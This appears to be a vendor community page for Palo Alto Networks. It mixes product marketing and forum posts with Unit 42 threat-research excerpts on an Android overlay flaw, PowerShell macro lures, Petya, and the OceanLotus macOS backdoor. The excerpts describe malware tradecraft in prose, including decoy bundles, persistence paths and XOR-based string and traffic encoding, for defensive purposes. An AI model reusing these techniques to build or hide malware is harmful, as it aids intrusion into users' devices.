Palo Alto Networks
I am an aspiring network engineer and I have seen many job listings that desire knowledge of Palo Alto technology. I plan to go thru the CBT Nuggets training for Palo Alto once I finish my network security class I’m currently enrolled in and I would like a VM or firewall appliance to lab and learn with. I’m wondering if you offer a LAB VM or device that I can use for educational purposes, and if so, what options are available and what are the costs. I have at my disposal an older Dell R410 server that I am currently running VMWare ESXi 6.7 on, along with my GNS3 lab environment.
Thank you for your time and any information you may provide.
Hey folks! Going through the Firewall 8.1 Essentials: Configuration and Management (EDU-210) next week in Boston and figured I'd pop on by here to see what's going on and noticed a LOT of great info from Louise a year ago, but have not seen anything since. I'm going to let folks know about Spiceworks next week (duh, of course I would) and point them in the direction of you folks. We'll have 16 people in class and should be pretty good, methinks.
Palo Alto Networks Unit 42 researchers are announcing details on a new high-severity vulnerability affecting the Google Android platform. Patches for this vulnerability are available as part of the September 2017 Android Security Bulletin. This new vulnerability does NOT affect Android 8.0 Oreo, the latest version; but it does affect all prior versions of Android. There is some malware that exploits some vectors outlined in this article, but Palo Alto Networks Unit 42 is not aware of any active attacks against this particular vulnerability at this time. Since Android 8.0 is a relatively recent release, this means that nearly all Android users should take action today and apply updates that are available to address this vulnerability.
What our researchers have found is a vulnerability that can be used to more easily enable an “overlay attack,” a type of attack that is already known on the Android platform. This type of attack is most likely to be used to get malicious software on the user’s Android device. This type of attack can also be used to give malicious software total control over the device. In a worst-case attack scenario, this vulnerability could be used to render the phone unusable (i.e., a “brick”) or to install any kind of malware including (but not limited to) ransomware or information stealers. In simplest terms, this vulnerability could be used to take control of devices, lock devices and steal information after it is attacked.
An “overlay attack” is an attack where an attacker’s app draws a window over (or “overlays”) other windows and apps running on the device. When done successfully, this can enable an attacker to convince the user he or she is clicking one window when, in fact, he or she is actually clicking another window. In Figure 1, you can see an example where an attacker is making it appear that the user is clicking to install a patch when in fact the user is clicking to grant the Porn Droid malware full administrator permissions on the device.
Figure 1: Bogus patch installer overlying malware requesting administrative permissions
You can see how this attack can be used convince users to unwittingly install malware on the device. This can also be used to grant the malware full administrative privileges on the device.
An overlay attack can also be used to create a denial-of-service condition on the device by raising windows on the device that don’t go away. This is precisely the type of approach attackers use with ransomware attacks on mobile devices.
Of course, an overlay attack can be used to accomplish all three of these in a single attack:
- Trick a user into installing malware on their device.
- Trick a user into giving the malware full administrative privileges on the device.
- Use the overlay attack to lock up the device and hold it hostage for ransom.
Overlay attacks aren’t new; they’ve been discussed before. But until now, based on the latest research in the IEEE Security & Privacy paper, everyone has believed that malicious apps attempting to carry out overlay attacks must overcome two significant hurdles to be successful:
- They must explicitly request the “draw on top” permission from the user when installed.
- They must be installed from Google Play.
These are significant mitigating factors and so overlay attacks haven’t been reckoned a serious threat.
However, our new Unit 42 research shows that there is a way to carry out overlay attacks where these mitigating factors don’t apply. If a malicious app were to utilize this new vulnerability, our researchers have found it could carry out an overlay attack simply by being installed on the device. In particular, this means that malicious apps from websites and app stores other than Google Play can carry out overlay attacks. It’s important to note that apps from websites and app stores other than Google Play form a significant source of Android malware worldwide.
The particular vulnerability in question affects an Android feature known as “Toast.” “Toast” is a type of notification window that “pops” (like toast) on the screen. “Toast” is typically used to display messages and notifications over other apps.
Unlike other window types in Android, Toast doesn’t require the same permissions, and so the mitigating factors that applied to previous overlay attacks don’t apply here. Additionally, our researchers have outlined how it’s possible to create a Toast window that overlays the entire screen, so it’s possible to use Toast to create the functional equivalent of regular app windows.
In light of this latest research, the risk of overlay attacks takes on a greater significance. Fortunately, the latest version of Android is immune from these attacks “out of the box.” However, most people who run Android run versions that are vulnerable. This means that it’s critical for all Android users on versions before 8.0 to get updates for their devices. You can get information on patch and update availability from your mobile carrier or handset maker.
Of course, one of the best protections against malicious apps is to get your Android apps only from Google Play, as the Android Security Team aggressively screens against malicious apps and keeps them out of the store in the first place.
A data center is a fixed environment where applications run on dedicated servers that can only be accessed by authorized users. In contrast, a cloud environment is dynamic and automated, where pools of computing resources are available to support application workloads that can be accessed anywhere, anytime, from any device. For the experienced information security professional, it seems that many of the principles that make cloud computing attractive run counter to network security best practices. What follows are the top three considerations for securing traditional and cloud-based data centers, as well as key requirements for cloud security.
Cloud Computing Does Not Lessen Existing Network Security Risks
The security risks that threaten a data center and network today change once applications move to the cloud, whether in a complete migration or in a hybrid scenario in which some applications move to the cloud while others remain on premises. In fact, in several ways, the security risks faced when moving to the cloud become more significant.
For example, many data center applications use a wide range of ports, rendering traditional security measures ineffective when those applications are moved to the cloud. Cybercriminals are creating sophisticated port-agnostic attacks that use multiple vectors to compromise their target, hiding in plain sight using common applications to complete their mission.Security Wants Separation and Segmentation - The Cloud Relies on Shared Resources
For decades, information security best practices dictated that mission-critical applications and data be separated into secure segments on the network. Often, this is referred to as Zero Trust: never trust, always verify.
On a physical network within the enterprise data center, Zero Trust is relatively straightforward to implement through the use of firewalls and VLANs (i.e., virtual LANs), managed by policies based on application and user identity.
In a cloud computing environment, direct communication between virtual machines within a server occurs constantly, in some cases across varied levels of trust. This makes segmentation a difficult task, especially given that cloud applications are based on the notion of shared resources. Mixed levels of trust, when combined with a lack of intra-host traffic visibility by virtualized port-based security offerings, will likely introduce a weakened security posture.Security Configurations Are Process-Oriented | Cloud Computing Environments Are Dynamic
Virtual workloads can be created or modified in minutes. As such, cloud computing teams operate in a highly dynamic environment, with workloads being added, removed and changed constantly.
By contrast, the security configuration for this workload may take hours, days or weeks. Security delays are not designed to create roadblocks. Rather, they are the result of a process that is designed to maintain a strong security posture. Policy changes need to be approved, the appropriate firewalls need to be identified, and the relevant policy updates determined.
Unless this imbalance is understood and addressed as part of the cloud migration, the result is a discrepancy between security policy and cloud workload deployment. The result is a weakened security posture that can put important data and intellectual property in danger and might also cause violations of compliance and governance policies and regulations.Key Requirements for Securing the Cloud
Consistent security in physical and virtualized form factors. The same levels of application control, rogue and misconfigured application handling, and threat prevention are needed to protect both the cloud computing environment and the physical network.
Segment business applications using Zero Trust principles. In order to fully maximize the use of computing resources, it is now a relatively common practice to mix application workload trust levels on the same compute resource. The goal is to control traffic between workloads while preventing the lateral movement of threats.
Centrally manage security deployments and streamline policy updates. Physical network security is still deployed in most every organization, so it is critical to have the ability to manage both hardware and virtual form factor deployments from a centralized location using the same management infrastructure and interface. The selected solution must be capable of spanning physical and virtual environments through a consistent policy management and enforcement framework and should include features that automate security policy updates.
To learn more about securing traditional and cloud-based data centers with next-generation firewalls, read the whitepaper.
Recently, Unit42 has been investigating malware utilizing PowerShell and have spent a considerable amount of time refining ways to identify new variants of attacks as they appear. This posting is a follow-up of previous work on this subject in “Pulling Back the Curtains on EncodedCommand PowerShell Attacks”.
In a sample recently analyzed, something stood out as extremely suspicious which led us down a rabbit hole, uncovering malicious infrastructure supporting Chthonic, Nymaim, and other malware and malicious websites.
Throughout this blog post we present our analysis and thought process during this research, but if you would just like a list of the findings, they are over on our Unit42 GitHub.
One of those things is not like the others....
Most commonly, PowerShell is launched from a Microsoft Office document that uses a VBA macro to launch PowerShell to perform something malicious – typically downloading the “real” malware to run. We focused our investigation on the PowerShell activity with Palo Alto Networks AutoFocus to determine whether it’s worth digging into further based on “uniqueness” and functionality.
In this case, the first sample we looked at stood out for another reason entirely. If you take a look at the below PowerShell, you’ll quickly understand why.
This code downloads a file from the legitimate Notepad++ website. My initial thought was the worst-case scenario – they’ve been compromised and are distributing malware! I immediately downloaded the file from the website, but everything looked normal. Of course, I had to investigate further.
The sample stayed true to the previous outline I laid out for these attacks: the Microsoft Excel document appeared to be a lure about financial information, specifically a VAT invoice written in Polish as shown below.
Looking under the hood we see the VBA code that builds the PowerShell command and launches it but something seemed off. There are a ton of functions that are clearly decoding information from arrays after which it executes an already decoded PowerShell command. I decided to debug the macro and see exactly what it’s doing before I made any decisions.
If you look at the above image, there are five things to note.
1. The variable ‘horrorr’ (double ‘r’) is the result of all of the previously mentioned decoding functions. This builds a PowerShell command.
2.You can see ‘Shelleeeee horrorr, 0’ commented out, I believe this was intended to launch the previous PowerShell command.
3. The ‘Debug.Print horrorr’ prints the content of that variable in the ‘Immediate’ area shown in the screenshot. The domain in this command is NOT ‘notepad-plus-plus.org’ and can be seen below.
4. The ‘MsgBox’ will pop-up and not display anything, because the variable passed is ‘horror’ (1 ‘r’) along with the message ‘Do you really think I’m not a virus?’ in Polish.
5. The hard coded PowerShell command with ‘notepad-plus-plus.org’ will run.
The most likely conclusion that can be drawn here is that an analyst or researcher obtained this file, modified it to see the content (misspelling the variable name along the way) post-decoding, and uploaded it to see what it did in a sandbox. To be sure though, I needed to find other samples and see how they stacked up against this one.
Going back to the PowerShell command, the initial reason I stopped to look at it was due to the way they concatenated variables to form the download command and output. This also provides a perfect pivot point to hunt for samples. Using the below string to search Process Activity in AutoFocus revealed 171 samples.
The dates were all fairly recent, having been received in the past few days since the beginning of August. The documents shared the same themes for lures but the VBA macro and resulting PowerShell were more along the lines of what I expected.
For sample “538ff577a80748d87b5e738e95c8edd2bd54ea406fe3a75bf452714b17528a87” the following is an excerpt from the VBA macro building the PowerShell command.We are limited on blog space here, but encourage you to go and read the full research on our Palo Alto Networks Research Center blog: https://researchcenter.paloaltonetworks.com/2017/08/unit42-the-curious-case-of-notepad-and-chthonic-... Edited Aug 29, 2017 at 07:51 UTC
The shift to the public cloud has offered organizations increased agility, flexibility and scalability. However, as more and more organizations move critical workloads to the public cloud, the potential for attackers to steal data, intellectual property or computing resources also rises.
Below is a brief breakdown of three considerations for securing public cloud workloads. Download the white paper to view the detailed list of all 10 top considerations.
Embrace the shared security model: The infrastructure is secured by the cloud service provider, but users are responsible for securing their own applications and data as it resides in the cloud. With this in mind, security practices must be implemented to secure workloads in the cloud as well as prevent loss of data and IP, just as if the workloads were on-premise.
Engage with business groups and DevOps early: Security teams and respective business groups, such as DevOps, should work collectively – particularly during initial stages of public cloud projects – to ensure all development needs are met while still maintaining a healthy security posture.
Know your potential exposure: Monitor public cloud usage, ensure proper configuration of the environment, enforce two-factor authentication, and properly lock down Secure Shell (SSH) access to gain visibility and minimize potential exposure through “shadow IT.”
Read the full list of our Top 10 Considerations for Securing Public Cloud Workloads.
GlobalProtect Clientless VPN is now GA in PAN-OS 8.0.4
One of the core preventive measures of our Next-Generation Security Platform comes from the role that the network plays in delivering protection. By placing security controls in the network, your organization can stop threats from reaching the user and control who has access to applications.
GlobalProtect Clientless VPN, initially realeased in beta in PAN-OS 8.0, is now GA with the release of PAN-OS 8.0.4, allows organizations to deploy GlobalProtect to a broader set of user communities, providing access to applications in situations where the GlobalProtect app isn’t installed. Now users can access applications in the cloud or data center with virtually any current browser. This makes it possible to support application access on endpoints that may have locked down configurations (such as machines where users do not have admin rights) or hardened configurations like a kiosk.
The traffic for accessing the application passes through the next-generation firewall, allowing organizations to set up User-ID policies to control who can access the application, along with the content inspection capabilities for stopping threats in traffic. You can use file blocking policies to control file blocking functionality when accessing internal applications on non-trusted endpoints.
Clientless VPN allows users to access applications in the data center or the cloud. Traditionally, organizations tried to address various use cases with a mix of remote access VPN, cloud access products and network security appliances in a non-integrated manner. GlobalProtect takes the approach of delivering Clientless VPN through the Palo Alto Networks Next-Generation Security Platform, providing better security with a streamlined user experience.
Organizations have a variety of user populations, and many of them are not using corporate assets. The BYOD trend, for example, leads to use cases where employees own the device but use it with business applications. Contractors have similar needs; some may be using laptops managed by another organization, and some may not be managed at all. You can use Clientless VPN as a complement to your BYOD strategy to increase your options for supporting access on personally owned devices. For example, your organization may choose to support BYOD in two ways: for managed personally owned devices, use integration with MobileIron, AirWatch and Microsoft InTune to deploy the GlobalProtect app in Per-App VPN configurations. In scenarios where the GlobalProtect app cannot be used, provide access to applications using Clientless VPN.
If you want to learn more about these capabilities:
- Sign up for the upcoming “Addressing BYOD with new GlobalProtect features” webinar to get the technical details
- Watch this video to learn how the Clientless VPN works
- Review our Technical Documentation for Clientless VPN
Gartner’s 2017 Magic Quadrant for Enterprise Network Firewalls has been released, and Palo Alto Networks is proud to be positioned in the Leaders quadrant for the sixth consecutive year. I invite you to read the 2017 Magic Quadrant for Enterprise Network Firewalls report.
Gartner’s Magic Quadrant provides a graphical competitive positioning of technology providers in markets where growth is high and provider differentiation is distinct. Leaders execute well against their stated visions and are well-positioned for tomorrow. Gartner researchers continue to highlight both our ability to execute and the completeness of our vision. You can find more details in the report.
More than 39,500 customers in 140 countries have chosen Palo Alto Networks to realize the benefits of a truly next-generation security platform, safeguard critical assets, and prevent known and unknown threats. To protect our customers and stay ahead of sophisticated cyberattackers, we maintain a steadfast commitment to innovation. We recently introduced several more disruptive capabilities:
- Application Framework: With a SaaS-based consumption model, Palo Alto Networks Application Framework allows customers to use new apps to solve the most challenging security use cases with the best technology available, without the cost and operational burden of deploying new infrastructure.
- GlobalProtect cloud service: GlobalProtect cloud service eases your next-generation firewall and GlobalProtect deployment by leveraging cloud-based security infrastructure operated by Palo Alto Networks.
- Logging Service: Palo Alto Networks Logging Service is a cloud-based offering for context-rich, enhanced network logs generated by our security offerings, including those of our next-generation firewalls and GlobalProtect cloud service.
DISCLAIMER: Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
In the last month, there have been several security news headlines highlighting incidents of accidental data exposure in the cloud. In some cases, portions of organizations’ most sensitive business and customer data were inadvertently exposed and left unprotected. That data loss could result in costly compliance violations and be detrimental to the business, especially if it were to find its way into the hands of a cybercriminal.
Accidental data exposure is risky. But as scary as the problem is, there are ways to ensure data loss prevention (DLP) in the cloud without sacrificing business productivity. Let’s explore the threat in a bit more detail and the steps you can take to protect yourself and your business.
Accidental Data Exposure – What’s So Risky?
Your users have good intentions (well, except for those malicious insiders). But they’re now used to an environment where they can access any application they want, from any device they want, from anywhere they choose, with little regard for the security risks involved. And with cloud and SaaS applications, which are specifically designed for easy sharing, the risk of data becoming unintentionally shared or exposed is often quite high. For example, an email with a shared link could be forwarded and eventually make its way outside of the organization. Similarly, the user sharing the file in the first place might accidentally click an incorrect email address when the application attempts to autocomplete. All you can do at that point is hope that the mistake doesn’t result in a security or compliance faux pas, or worse.
In addition, source code threats can be quite problematic. Engineers often hard-code user credentials into their API keys for third-party cloud services, such as Amazon Web Services (AWS), using source code, which is then uploaded into a web-based repository service, like GitHub. If leaked or breached, the source code provides an attacker with everything required to hack the AWS account, the API key and legitimate user credentials – all wrapped together with a neatly tied bow. Once inside, an attacker can mine for sensitive data with the intent to auction it off to the highest bitcoin bidder.
How Can You Protect Yourself and Your Business?
- Do a self-assessment.
- Get the right tools to ensure data loss prevention (e.g., app discovery, data classification and monitoring, content matching, machine learning).
- Implement an ongoing feedback loop.
Get your copy of the Comprehensive Data Security In The Cloud eGuide for more information on each of the steps listed above.
At Palo Alto Networks, we take a platform approach to addressing data loss prevention in the cloud. Rather than relying on disparate point products, our prevention-focused Next-Generation Security Platform extends and enforces existing enterprise security tools and policies across the cloud to mitigate risk and prevent inadvertent data loss and exposure.
Learn More: Comprehensive Data Security In The Cloud eGuide
WildFire cloud-based threat analysis service is the industry’s most advanced analysis and prevention engine for highly evasive zero-day exploits and malware. The cloud-based service employs a unique multi-technique approach combining dynamic and static analysis, innovative machine learning techniques, and a groundbreaking bare metal analysis environment to detect and prevent even the most evasive threats.
Find the Unknown With a Unique Multi-Technique Approach
WildFire goes beyond legacy approaches used to detect unknown threats, bringing together the benefits of four independent techniques for high-fidelity and evasion-resistant discovery, including:
- Dynamic analysis: Observes files as they detonate in a custom-build evasion resistant virtual environment, enabling detection of zero-day malware and exploits using hundreds of behavioral characteristics.
- Static analysis: Highly effective detection of malware and exploits that attempt to evade dynamic analysis, as well as instantly identifying variants of existing malware.
- Machine learning: Extracts thousands of unique features from each file, training a predictive machine learning classifier to identify new malware and exploits not possible with static or dynamic analysis alone.
- Bare metal analysis: Evasive threats are automatically sent to a real hardware environment for detonation, entirely removing an adversary’s ability to deploy anti-VM analysis techniques.
Together, these techniques allow WildFire to discover and automatically prevent unknown exploits and malware with high efficacy and near-zero false positives.See how WildFire works together with the Palo Alto Networks Next-Generation Security Platform to automatically identify and prevent unknown attacks in 300 seconds, across the network, endpoint and cloud.
A data center houses an enterprise’s most critical data, such as source code, financial and personal information, or designs for pharmaceutical drugs – the enterprise’s digital crown jewels.
Designing and deploying a best practice security policy to protect your valuable data means protecting not only the perimeter of your enterprise network; it means protecting the connections into and out of the data center perimeter, as well as the connections between servers and VMs inside the data center.
But how do you transition to a data center best practice security policy?
In “Data Center Best Practice Security Policy Part 1: Concepts,” you’ll be presented with ways to think about a best practice security policy strategy and how to design it for your particular business, with the goal of achieving positive security enforcement that allows only the users, applications and content that you explicitly permit on the network, and denies all other traffic. It addresses questions such as:How do you create a transition strategy that aligns with your business goals?How do you decide which assets to protect first?What methods should you use to make the transition?How will you protect your data center during the transition?
If you enjoyed part 1, look for “Data Center Best Practice Security Policy Part 2: Implementation” to learn the specific best practices to apply to traffic at the perimeter and inside the data center.
This Unit 42 blog provides an update on the threat situation surrounding attacks using the Petya Ransomware which are impacting organizations in Ukraine and other parts of Europe.
On June 27th, 2017 we became aware of a new variant of the Petya malware which is spreading over the Microsoft Windows SMB protocol. The malware appears to use the ETERNALBLUE exploit tool to accomplish this. This is the same exploit the WanaCrypt0r/WanaCry malware exploited to spread globally in May, 2017. Multiple organizations have reported network outages, including government and critical infrastructure operators.
Palo Alto Networks is documenting our prevention capabilities with regard to this threat in the Palo Alto Networks Protections for Petya Ransomware blog post. Windows users should take the following general steps to protect themselves:
- Apply security updates in MS17-010
- Block inbound connections on TCP Port 445
- Create and maintain good back-ups so that if an infection occurs, you can restore your data.
This is a developing situation, we will update this blog as new information becomes available. AutoFocus users view samples using the Petya tag.This is a developing situation, we will update this blog as new information becomes available. AutoFocus users view samples using the Petya tag.
Get the full insight on Petya Ransomware in our developing Threat Brief here: https://researchcenter.paloaltonetworks.com/2017/06/unit42-threat-brief-petya-ransomware/
Cloud-based logging service to enable innovative security applications
Adversaries constantly change tactics making it harder to detect attacks. Therefore, to surface evasive threats and prevent attacks, organizations must be able to perform advanced analytics on all the available data. Security applications that perform such analytics need access to scalable storage capacity and processing power.
Palo Alto Networks Logging Service is a cloud-based offering for context-rich enhanced network logs generated by our security offerings including those of our Next-Generation Firewalls and GlobalProtect cloud service. The cloud-based nature of the Logging Service allows customers to collect ever expanding rates of data, without needing to plan for local compute and storage.
Logging Service is the cornerstone of Palo Alto Networks application framework, which provides a scalable ecosystem of security applications that can apply advanced analytics in concert with Palo Alto Networks enforcement points to prevent the most advanced attacks. You are no longer limited by how much hardware is available nor by how quickly the sensors can be deployed.
- Leverages powerful, elastic cloud-based computing to provide analytics and insights on large amounts of data.
- Simplifies operations by eliminating activities required to operationalize logging capacity.
- Increases agility by allowing you to become more responsive to your changing business needs.
Recently, we discovered a new version of the OceanLotus backdoor in our WildFire cloud analysis platform which may be one of the more advanced backdoors we have seen on macOS to date. This iteration is targeted towards victims in Vietnam and still maintains extremely low AV detection almost a year after it was first discovered. Despite having been in the wild for an extended period of time, the operation appears to still be active. During our analysis, we were able communicate directly with the command and control server as recently as early June 2017.
While there seem to be similarities to an OceanLotus sample discovered in May 2015, a variety of improvements have been made since then. Some of the improvements include the use of a decoy document, elimination of the use of command line utilities, a robust string encoding mechanism, custom binary protocol traffic with encryption, and a modularized backdoor.Infection Vector
The new OceanLotus backdoor is distributed in a zip file. While we don’t have direct evidence for the initial infection vector we presume it’s most likely via an email attachment. Once the user has extracted the zip file, they see a directory containing a file with a Microsoft Word document icon. The file is actually an application bundle, which contains executable code. (see Figure 1). Once the user double clicks on the purported Word document, the Trojan executes and then launches Word to display a decoy document.
The malware uses the decoy document to help mask the execution of the malware. This technique is a common one for Windows-based malware, but rare on macOS. In order to achieve this layer of obfuscation, the malware author had to trick the operating system into believing the folder is an application bundle despite the .docx extension. Traditionally, macOS malware have emulated legitimate application installers such as Adobe Flash, which was how the previous version of OceanLotus was packaged.Figure 1. Context menu and file listing
Once the application bundle is launched, it opens a hidden file in the bundle’s Resources folder named .CFUserEncoding which is a password-protected Word document (see Figure 2). It also copies this file to the executable path and essentially replaces the application bundle after persistence has been set up. This would lead the victim to believe that nothing was amiss, as they thought they were opening a Word document and a Word document opened. In this case, the Word file has the name “Noi dung chi tiet.docx”, which is Vietnamese for “Details.”
Figure 2. Decoy document prompts for a password to open the file.
Compared to the previous version of this backdoor, the persistence mechanism for this remained largely the same. This version creates a Launch Agent that runs when the victim host starts up, where as in the previous version execution was upon when a user logs in. It also copies itself to a different location and filename based on the UID of the user who ran the application.
For a user other than root, it takes the MD5 hash of the structure returned by getpwuid() and breaks the hash down into segments <first 8 chars of hash>-<next 16 chars of hash>-<last 8 chars of hash>. This segmented MD5 hash is prepended with “0000-“ then used as a directory in ~/Library/OpenSSL/ to store the executable file (see Figure 3). If the user is root, the executable is stored in the system wide library directory at /Library/TimeMachine/bin/mtmfs.
It is interesting to note that the executable and plist locations look like legitimate applications.
Figure 3. plist and executable names and locations based on UID
Once the malware has set up persistence, it deletes the application bundle from the executable path leaving the decoy document in its place and launches itself as a service from the new location.
No Command Line Utilities
One of the first things we noticed about this backdoor is the lack of suspicious strings which often times provides context as to what the malware might do on a victim host. In most macOS malware, calls to the system() or exec() functions to run additional scripts are in place. In this case, these were not present nor were there command line utility strings that may easily convey the malicious intention of the application. This shows a deep level of understanding of the macOS platform by the author of this backdoor compared to other threat actors that will commonly copy and paste scripts from the Internet.
The lack of these strings may also double as an anti-analysis technique to make the malware seem less suspicious, especially to basic static analysis.String Decoding
Since there appear to be no obvious suspicious strings in plaintext, we move onto the possibility of use of encoded, or obfuscated strings.
The string decode routine for this backdoor is an upgrade from previous versions in which strings were XOR encoded with the word “Variable” as a key. The string decode routine now consists of a combination of bit shifting and XOR operations with a variable key that depends on the length of the string that was encoded. If the computation for the variable XOR key turns out to be 0, the default XOR key of 0x1B is used. Figure 4 shows a Python implementation of the decode function.Figure 4. Python implementation of the malware's string decode function.
After decoding the strings (see Figure 5), we can glean that the malware sets up persistence, surveys the victim’s computer, and sends this information back to a server. At this point, it is still not obvious that this malware contains backdoor functionality.
Figure 5. List of decoded strings.
Custom Binary Protocol and Encrypted Traffic
The threat actors responsible for this malware appear to have spent some amount of effort to develop their own custom communication protocol. They did not simply use an off-the-shelf web server for their command and control server, as is commonly done. Instead, they created their own command and control mechanism.
The backdoor uses a custom binary protocol on TCP port 443, a well-known port that is unlikely to be blocked by traditional firewalls due to its use in HTTPS connections. The packet seen in Figure 6 is encoded with a combination of bit shifting (see Figure 7) and XOR with a key of 0x1B before it is sent. The bits are always rotated to the left 3 times before doing the XOR operation. This is an improvement from the previous version where the packet was only XOR encoded with a key of 0x1B.Get the rest of the Unit 42 research and solutions here: https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/
This video demonstrates how to configure three types of Source NAT rules:
- Dynamic IP and Port
- Dynamic IP
- Static IP
Customize Header Background
Customize Page CSS
This is the CSS that will be included for all tabs for this vendor page.